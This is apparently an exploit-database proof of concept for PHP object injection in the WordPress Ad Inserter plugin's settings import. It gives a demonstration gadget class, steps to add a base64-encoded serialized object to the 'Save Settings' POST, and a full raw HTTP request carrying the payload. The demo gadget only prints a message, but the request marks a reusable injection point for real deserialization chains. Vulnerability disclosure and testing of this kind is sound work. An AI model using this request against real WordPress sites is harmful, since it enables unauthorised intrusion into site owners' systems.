## https://sploitus.com/exploit?id=WPEX-ID:C94B3A68-673B-44D7-9251-F3590CC5EE9E
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Activate and access Settings > Ad Inserter then click to setting icon and finally click "Save Settings". It'll make a POST request.
Add "&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9" to body of that request. "Tzo0OiJFdmlsIjowOnt9" is base64encode of O:4:"Evil":0:{}.
The view the response of the request made, which will have the "Arbitrary deserialization" message
---
POST /wordpress/wp-admin/options-general.php?page=ad-inserter.php HTTP/1.1
Host: {host}
Content-Length: 887
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
block-parameters-1=WyJhaV9zYXZlIl0%3D&block-parameters-2=WyJhaV9zYXZlIl0%3D&block-parameters-3=WyJhaV9zYXZlIl0%3D&block-parameters-4=WyJhaV9zYXZlIl0%3D&block-parameters-5=WyJhaV9zYXZlIl0%3D&block-parameters-6=WyJhaV9zYXZlIl0%3D&block-parameters-7=WyJhaV9zYXZlIl0%3D&block-parameters-8=WyJhaV9zYXZlIl0%3D&block-parameters-9=WyJhaV9zYXZlIl0%3D&block-parameters-10=WyJhaV9zYXZlIl0%3D&block-parameters-11=WyJhaV9zYXZlIl0%3D&block-parameters-12=WyJhaV9zYXZlIl0%3D&block-parameters-13=WyJhaV9zYXZlIl0%3D&block-parameters-14=WyJhaV9zYXZlIl0%3D&block-parameters-15=WyJhaV9zYXZlIl0%3D&block-parameters-16=WyJhaV9zYXZlIl0%3D&ai_save=Save+Settings&syntax-highlighter-theme=ad_inserter&plugin-usage-tracking=1&ai-active-tab=%5B0%2C0%5D&_wpnonce=48546fc1cb&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dad-inserter.php&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9